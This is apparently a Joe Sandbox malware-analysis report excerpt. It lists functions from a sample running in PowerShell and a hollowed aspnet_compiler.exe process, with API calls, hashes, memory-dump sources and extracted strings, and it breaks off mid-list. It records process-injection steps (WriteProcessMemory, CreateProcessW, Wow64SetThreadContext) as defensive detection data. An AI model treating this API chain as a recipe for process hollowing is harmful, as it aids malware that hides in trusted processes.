Opcode ID: eb5aed9d3ce9e5318a35b52d5779236606912954c8ede3ead6646ac73b893eec
Instruction ID: a8646d1b00b8ffe9dea8458c3e61ae6dfd1e10963dbc930b82f9e93da75494da
Opcode Fuzzy Hash: eb5aed9d3ce9e5318a35b52d5779236606912954c8ede3ead6646ac73b893eec
Instruction Fuzzy Hash: 83018075E00309CFEBA4CE59C540776B7B5AB82611F2E406ACE0587100EB31EE92CBD2

Function 028CCDC4 Relevance: 2.6, APIs: 1, Instructions: 1090
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,00000000,00000000,1701789D,00000000,?,?,?,?,00000000,?,028CC363,?,00000000,?), ref: 028CD254

Memory Dump Source

Source File: 00000007.00000002.2501281660.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28c0000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 6d48e3ebf3b50d44a9dde8007708df7b9895d7dae532a2382f566434aa674b5b
Instruction ID: 121cf98c17c04c144d3afa978b8d638de573de5f1c499c78561c58b3316a426d
Opcode Fuzzy Hash: 6d48e3ebf3b50d44a9dde8007708df7b9895d7dae532a2382f566434aa674b5b
Instruction Fuzzy Hash: F4318C798053889FCB01CFA9C880ADEBFF4EF0A314F1484AAE558E7211C338A944CB61

Function 028CCA14 Relevance: 1.7, APIs: 1, Instructions: 160
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 028CCB64

Memory Dump Source

Source File: 00000007.00000002.2501281660.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28c0000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 983681dd486d1e3281295b986b9339f8c71652069a3bc8a79f8ff409dcab4c40
Instruction ID: e50cfc4eae0aad8beb610ff9ca437fa5c338b551adf9eac339705da9e81ec20b
Opcode Fuzzy Hash: 983681dd486d1e3281295b986b9339f8c71652069a3bc8a79f8ff409dcab4c40
Instruction Fuzzy Hash: A95126B5901229DFDF24CF99C984BDDBBB5BF48304F1084AAE909B7250D7359A89CF90

Function 028C75A4 Relevance: 1.7, APIs: 1, Instructions: 156
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 028CCB64

Memory Dump Source

Source File: 00000007.00000002.2501281660.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28c0000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 2697bffff86333477df65001f8d889f82ca0d8529c9d6744dde7cd5a477409e0
Instruction ID: 13d611762c66ab049c8ebfc3b051108d4b03b3427cc9001fb6488f36241c092f
Opcode Fuzzy Hash: 2697bffff86333477df65001f8d889f82ca0d8529c9d6744dde7cd5a477409e0
Instruction Fuzzy Hash: 455136B5901219DFDF24CF99C980BDDBBB1BF48304F1085AAE909B7250D7759A88CF90

Function 028C75C8 Relevance: 1.6, APIs: 1, Instructions: 63
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,00000000,00000000,1701789D,00000000,?,?,?,?,00000000,?,028CC363,?,00000000,?), ref: 028CD254

Memory Dump Source

Source File: 00000007.00000002.2501281660.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28c0000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: aa64706c326838dabf3f4ffe3a155523d127d824f42950fc8abf01e20dd65318
Instruction ID: 40ec2f85cc1265c682e592f59203540df64556bc395fd96cf6024f5c45b138e6
Opcode Fuzzy Hash: aa64706c326838dabf3f4ffe3a155523d127d824f42950fc8abf01e20dd65318
Instruction Fuzzy Hash: 2121D5B59003599FDB10DF99D984BDEFBF4FB49324F50842AE918E7200D378A944CBA5

Function 028C75B0 Relevance: 1.6, APIs: 1, Instructions: 57
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,028CC03A), ref: 028CCCCB

Memory Dump Source

Source File: 00000007.00000002.2501281660.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28c0000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 3922fc415be44c0ee97a1c4b30719086498db8a61693ced83331c50a7f578109
Instruction ID: 5130f2a903484115a578cbbc231dfb6febc180ada35851e806cbc44d0d432f17
Opcode Fuzzy Hash: 3922fc415be44c0ee97a1c4b30719086498db8a61693ced83331c50a7f578109
Instruction Fuzzy Hash: C21129B5D002498FDB10CF9AC944BDEBBF4EB89320F14806ED518E3210D379A545CFA5

Function 028C75D4 Relevance: 1.6, APIs: 1, Instructions: 57
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,028CC03A), ref: 028CCCCB

Memory Dump Source

Source File: 00000007.00000002.2501281660.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28c0000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 287047d4299951bb348e056db968966082460a4198955bc4455e5d2ef26d84f2
Instruction ID: 5567ad9ffe2d642b1de7bb94d1a6d05e343c8c42952af758b1c335b3a7ba9864
Opcode Fuzzy Hash: 287047d4299951bb348e056db968966082460a4198955bc4455e5d2ef26d84f2
Instruction Fuzzy Hash: 251114BA9002498FDB10CF9AC944BDEBBF4EB89320F14806AE518E3210D378A545CFA5

Function 028CCC58 Relevance: 1.6, APIs: 1, Instructions: 56
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,028CC03A), ref: 028CCCCB

Memory Dump Source

Source File: 00000007.00000002.2501281660.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28c0000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: df3a928c25e6577015ace0857d22b2fd8805ed828328cb41c06b0a5579e231c3
Instruction ID: 3393e6645a93dbd72d541449e1cb53c0ca53f7f5d99e2d864166ba44cf3d9de6
Opcode Fuzzy Hash: df3a928c25e6577015ace0857d22b2fd8805ed828328cb41c06b0a5579e231c3
Instruction Fuzzy Hash: 011129B9D002498FDB10CF9AC944BDEBBF4EB89320F14856AD528E3250D378A544CFA5

Function 06F51EF9 Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

4']q, xrefs: 06F51FF2

Memory Dump Source

Source File: 00000007.00000002.2539411201.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f50000_powershell.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: 658738e78250ebd5b51bb824117a1e1a04d6703f17e7df2ac5810b22b58154cd
Instruction ID: af8e6dd9dde680c2ff64f551c0e72b6fac8c34d632ae87cefe5f261260369f04
Opcode Fuzzy Hash: 658738e78250ebd5b51bb824117a1e1a04d6703f17e7df2ac5810b22b58154cd
Instruction Fuzzy Hash: 8C31D131E06205CFDB94CF65C460B697BE1BF81210F0A82A7DA48CB261D735ED85CBA2

Function 06F50001 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2539411201.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d012f7e305a99ef4eb0432c8ec040799662c21de5136a4f0895fcbf4ddc28f14
Instruction ID: af0fd95cdd86815cb218af9b71dba8fa60ff12754b5658d5727d80e09fb229d2
Opcode Fuzzy Hash: d012f7e305a99ef4eb0432c8ec040799662c21de5136a4f0895fcbf4ddc28f14
Instruction Fuzzy Hash: 8811572190E3C14FD7435B3088240927F769E8321034A19CBE581CF5E3D9694E99C3B6

Function 0280D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2500332790.000000000280D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0280D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_280d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be5668721d31c1433b89e783ae7bfcb1ab5479d3f3f4e5767920d5249dcaa286
Instruction ID: 92c86e6558682264e66a4701c1b89dcc94ddde1b3d7cda9093a20ead23068840
Opcode Fuzzy Hash: be5668721d31c1433b89e783ae7bfcb1ab5479d3f3f4e5767920d5249dcaa286
Instruction Fuzzy Hash: 0801F7795053449AE7608A95CDC4F67BF9CEF45324F18C429ED4C8A2C6C3799841C6B1

Function 0280D007 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2500332790.000000000280D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0280D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_280d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40b98e87917aacf311f274bc920f221524b45fed03c3d4e8e196fcfca9d17193
Instruction ID: 9bb29f3ee6c677da9f5aed98e3d54497f24d3a6d6b0235b42d0cd4cb35b2ab38
Opcode Fuzzy Hash: 40b98e87917aacf311f274bc920f221524b45fed03c3d4e8e196fcfca9d17193
Instruction Fuzzy Hash: F8014C7540E3C09ED7128B258C94B62BFB4EF57224F1DC0DBD9888F2A3C2699849C772

Non-executed Functions

Function 028C5425 Relevance: .6, Instructions: 552COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2501281660.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05f7e033b1a46319b0edb602260d1ca1c6470ea567287011048f50b855cfed4e
Instruction ID: e9142bfc0bba13dddf99e39fc87eff74a1590b318e937eff67cd661ce8563e61
Opcode Fuzzy Hash: 05f7e033b1a46319b0edb602260d1ca1c6470ea567287011048f50b855cfed4e
Instruction Fuzzy Hash: 7D029B5980E3E05FDB079B3C887489A7F75AE5321875A41DBC090DF0B7D62CE849C3A6

Function 06F500F0 Relevance: 9.1, Strings: 7, Instructions: 329COMMON

Download Yara Rule

Strings

$]q, xrefs: 06F501B3
$]q, xrefs: 06F501A7
4']q, xrefs: 06F501CA
4']q, xrefs: 06F501D6
4']q, xrefs: 06F50373
$]q, xrefs: 06F5018B
4']q, xrefs: 06F50367

Memory Dump Source

Source File: 00000007.00000002.2539411201.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f50000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$$]q$$]q$$]q
API String ID: 0-3877577046
Opcode ID: 1690bb7f3a74bf35879ce665226e41bf2c9e74f6d11d0565d2547f967e245f5a
Instruction ID: 412348e8636af2244bb9b405a91df274ff0519e934bd208a9163594e1ca9efd6
Opcode Fuzzy Hash: 1690bb7f3a74bf35879ce665226e41bf2c9e74f6d11d0565d2547f967e245f5a
Instruction Fuzzy Hash: BAB12331F043059FDBA49F68C850A6ABBE6EF85310F16847ADE45CB252DE35CC46C7A2

Function 06F505E5 Relevance: 7.6, Strings: 6, Instructions: 76COMMON

Download Yara Rule

Strings

4']q, xrefs: 06F5064B
4']q, xrefs: 06F506DF
$]q, xrefs: 06F506B2
4']q, xrefs: 06F506D3
4']q, xrefs: 06F50657
$]q, xrefs: 06F506BE

Memory Dump Source

Source File: 00000007.00000002.2539411201.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f50000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$$]q$$]q
API String ID: 0-2669322367
Opcode ID: 67f2bfe9d854cbfcec5cbe175205ea4e89bc1113e22e128acb65337cd45ce358
Instruction ID: 12d0f00505f7a93742a89f105e3344db81a39a851bc7836821f09ee4b3a43cf4
Opcode Fuzzy Hash: 67f2bfe9d854cbfcec5cbe175205ea4e89bc1113e22e128acb65337cd45ce358
Instruction Fuzzy Hash: 11112732B093564FC7A9166C243012A6BE79FC3B2076B49A7CD81CB396DE148C8583D2

Function 06F50BE8 Relevance: 5.1, Strings: 4, Instructions: 71COMMON

Download Yara Rule

Strings

$]q, xrefs: 06F50C3F
$]q, xrefs: 06F50C95
$]q, xrefs: 06F50C5B
$]q, xrefs: 06F50C77

Memory Dump Source

Source File: 00000007.00000002.2539411201.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f50000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 8f38a2c5cf79e76b3bada27b2ccc2276b10732e04a0fb7247c096e9849fcba58
Instruction ID: e77a2b8f6c54a25c3729f7b870a94067a2398b527cb0d1bcb558c1d68b7e9338
Opcode Fuzzy Hash: 8f38a2c5cf79e76b3bada27b2ccc2276b10732e04a0fb7247c096e9849fcba58
Instruction Fuzzy Hash: 7C21D532E1030A9FEBB48E588984B76B7F5AF46710F1A4066DE4987241DF31DC41CBA1

Analysis Process: aspnet_compiler.exePID: 3924, Parent PID: 6084COMMON

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	5.6%
Signature Coverage:	8.8%
Total number of Nodes:	125
Total number of Limit Nodes:	13

Executed Functions

Function 00417063 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004170D5

Memory Dump Source

Source File: 0000000B.00000002.2534332351.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: d1d4f16ca705b75c08d2dd02030cb8e35a3b9e5fbcaa9c1acce442b9868752c5
Instruction ID: d2bdfe92a6df6b11a72e1f8b55d3ed58340993e138cd653c837ef381cf487159
Opcode Fuzzy Hash: d1d4f16ca705b75c08d2dd02030cb8e35a3b9e5fbcaa9c1acce442b9868752c5
Instruction Fuzzy Hash: 000171B5E0020DBBDF10DBE1DC42FDEB778AB14308F0081AAE90897241F675EB488B95

Function 0042BDA3 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042BDD7

Memory Dump Source

Source File: 0000000B.00000002.2534332351.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 665f723a5e82ca476e461ccdd2d259e5560fa7235934546a3ffd52d987c7a3c7
Instruction ID: d90ea754d99db2d9abd4fcdc73495245e7fae96ad713b828660b781994584198
Opcode Fuzzy Hash: 665f723a5e82ca476e461ccdd2d259e5560fa7235934546a3ffd52d987c7a3c7
Instruction Fuzzy Hash: CDE04F712403147BC610AA5AEC41F9B776CDBC5714F004069FA0C67181C7B5BA1487F4

Function 00F535C0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 00F535CA

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2d4bade71e86be2d3f159d93e56960427a2c0a5b570fe3eb031ded0fcf1abfa2
Instruction ID: 825672901ac3b25afccca9089c1986fa817c9accde6006389c8386bf1280c07b
Opcode Fuzzy Hash: 2d4bade71e86be2d3f159d93e56960427a2c0a5b570fe3eb031ded0fcf1abfa2
Instruction Fuzzy Hash: 1390027160550412D20071988514706101587D0341F65C526A4424568E8B998A5275A2

Function 00F52B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 00F52B6A

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 58a77e90811cb8b7dd486808fa04a9c617b08331517e0d991e636d4295e41f3f
Instruction ID: 9d473c31f380739c6d98049cc79d031aca618cf058502372f66b70e5ce64b145
Opcode Fuzzy Hash: 58a77e90811cb8b7dd486808fa04a9c617b08331517e0d991e636d4295e41f3f
Instruction Fuzzy Hash: 9F9002A120240013420571988414616401A87E0341B55C136E5014590EC92989927125

Function 00F52C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 00F52C7A

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8c0118d1cedcb1dd432e6db9d557960ee71ca290b90aa80412a896a8d62bed14
Instruction ID: 34fc8f43d0928dfb44853b6dc41f1b00730fe5cf458cc32fd667a2be228751bf
Opcode Fuzzy Hash: 8c0118d1cedcb1dd432e6db9d557960ee71ca290b90aa80412a896a8d62bed14
Instruction Fuzzy Hash: CC90027120148812D2107198C40474A001587D0341F59C526A8424658E8A9989927121

Function 00F52DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 00F52DFA

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f5fa8a6126e59d6d380c3551e54684ff1a7c7046451819c4b4df263974fc6b2b
Instruction ID: 3fa4c592a735a157a5937bbc1d020b6ad550527327b28c44cfb0d8deb062797c
Opcode Fuzzy Hash: f5fa8a6126e59d6d380c3551e54684ff1a7c7046451819c4b4df263974fc6b2b
Instruction Fuzzy Hash: 0590027120140423D21171988504707001987D0381F95C527A4424558E9A5A8A53B121

Function 0042C0E3 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,55CCCCC3,00000007,00000000,00000004,00000000,004168EC,000000F4), ref: 0042C11C

Memory Dump Source

Source File: 0000000B.00000002.2534332351.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: d04050c8db7351cb7c42311d341b67d43b6c02a65ccfbd1526b30e449c1422bb
Instruction ID: d601fce2e6cfc47c523398d08e96a68e9c79fc9ca5f02ac62e6cc3558dbc2de4
Opcode Fuzzy Hash: d04050c8db7351cb7c42311d341b67d43b6c02a65ccfbd1526b30e449c1422bb
Instruction Fuzzy Hash: D4E0EDB2244214BBD614EF99DC41F9B77ADDFC9714F004459FA08A7281D674BD14CAB8

Function 0042C0A3 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041DE11,?,?,00000000,?,0041DE11,?,?,?), ref: 0042C0DC

Memory Dump Source

Source File: 0000000B.00000002.2534332351.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 53b584e200e5f2eb778bd4060701bbb0a480973bbaf0056c1c6602fc846fd21c
Instruction ID: e057fd75638c54c2a83d139f9191c8a4f81c752b1f28dea9c101fe2514506ad0
Opcode Fuzzy Hash: 53b584e200e5f2eb778bd4060701bbb0a480973bbaf0056c1c6602fc846fd21c
Instruction Fuzzy Hash: 68E06DB1204204BBDA14EE99EC41FAB37ACEFC9714F104019FA08A7281C674BD1487F8

Function 0042C123 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?), ref: 0042C157

Memory Dump Source

Source File: 0000000B.00000002.2534332351.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 29205141e20994605a55deee26b2df85bd7a3aaca56f5563100d8efa15c00275
Instruction ID: 5b3de0624fe0a28c818fb70999a8e3532c71153bdfbe5aac28f931c41c5855af
Opcode Fuzzy Hash: 29205141e20994605a55deee26b2df85bd7a3aaca56f5563100d8efa15c00275
Instruction Fuzzy Hash: 10E086352402147BC610EB5ADC41F9B776CDFC5714F108419FA0CA7181C671BA1487F4

Function 00F52C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 00F52C24

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e2935efcc429f249479dbe7155df7a6c7c7e9b4970791a6e31bf0e3ea3169f19
Instruction ID: c8bc80eeecb8fb5568f8fa6fa79a1c4a930bfd57bbecd991609cd08d5a426bdd
Opcode Fuzzy Hash: e2935efcc429f249479dbe7155df7a6c7c7e9b4970791a6e31bf0e3ea3169f19
Instruction Fuzzy Hash: 52B09B71D015C5D5DB51E760460C71B791067D1751F15C176D7030641F473CC5D6F175

Non-executed Functions

Function 00F92349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

UseImpersonatedDeviceMap, xrefs: 00F9251C
Initializing the application verifier package failed with status 0x%08lx, xrefs: 00F93176
@, xrefs: 00F92B74
TracingFlags, xrefs: 00F92549
minkernel\ntdll\ldrinit.c, xrefs: 00F93187
MaxDeadActivationContexts, xrefs: 00F92D82
LdrpInitializeExecutionOptions, xrefs: 00F9317D
UnloadEventTraceDepth, xrefs: 00F924C0
GlobalFlag2, xrefs: 00F92FC0
ExecuteOptions, xrefs: 00F925A0
DisableExceptionChainValidation, xrefs: 00F9275F
FrontEndHeapDebugOptions, xrefs: 00F92489
CFGOptions, xrefs: 00F92967
ShutdownFlags, xrefs: 00F924A1
RaiseExceptionOnPossibleDeadlock, xrefs: 00F92579
@, xrefs: 00F92942
MinimumStackCommitInBytes, xrefs: 00F92BB0
DisableHeapLookaside, xrefs: 00F9246D
GlobalFlag, xrefs: 00F92F3F, 00F93059
MaxLoaderThreads, xrefs: 00F924EC

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 36ec69a3b0cae670f3daed7f591244eca7b93cf4399981b97a4a3f929efe4db4
Instruction ID: 3fc6d1ef93ce7a62f5d9c617536c3e13eb85cfbf041167ecd1e02e06242b9c5f
Opcode Fuzzy Hash: 36ec69a3b0cae670f3daed7f591244eca7b93cf4399981b97a4a3f929efe4db4
Instruction Fuzzy Hash: 6D92CF71A08341AFEB61CF24CC81B6BB7E8BB84724F04491DFA84D7291D774E944EB92

Function 00FC12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON

Download Yara Rule

Strings

Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 00FC18A5
HEAP[%wZ]: , xrefs: 00FC16CD, 00FC16F9, 00FC1749, 00FC179B, 00FC17FC, 00FC1840, 00FC18D9
Heap block at %p has incorrect segment offset (%x), xrefs: 00FC181A
Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 00FC186B
Heap block at %p is not last block in segment (%p), xrefs: 00FC17B7
Heap block at %p has corrupted PreviousSize (%lx), xrefs: 00FC176D
Free Heap block %p modified at %p after it was freed, xrefs: 00FC171B
Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 00FC18F8
HEAP: , xrefs: 00FC1706, 00FC1756, 00FC17A8, 00FC1809, 00FC184D, 00FC1895, 00FC18E6

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
API String ID: 0-3591852110
Opcode ID: dd907ffad63c7839b5911526734ff519fba6841b176ef71ff00d980f7de1f5b0
Instruction ID: 3317c68edaaa1e4eba375cbb3af483c8b78a7ff3364d90c66fc2b2351398f868
Opcode Fuzzy Hash: dd907ffad63c7839b5911526734ff519fba6841b176ef71ff00d980f7de1f5b0
Instruction Fuzzy Hash: 9912AD31A00646DFD725CF28C542BB6BBF1FF0A714F18845DE4868B692D738E8A1EB50

Function 00FC0274 Relevance: 11.6, Strings: 9, Instructions: 348COMMON

Download Yara Rule

Strings

ribeWnfStateChange, xrefs: 00FC028F
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 00FC04D3
RtlReAllocateHeap, xrefs: 00FC02BF, 00FC0362
HEAP[%wZ]: , xrefs: 00FC0399, 00FC04A8, 00FC05D0, 00FC0675, 00FC06CC
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 00FC06EA
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 00FC069F
About to reallocate block at %p to %Ix bytes, xrefs: 00FC03BA
Just reallocated block at %p to %Ix bytes, xrefs: 00FC05F1
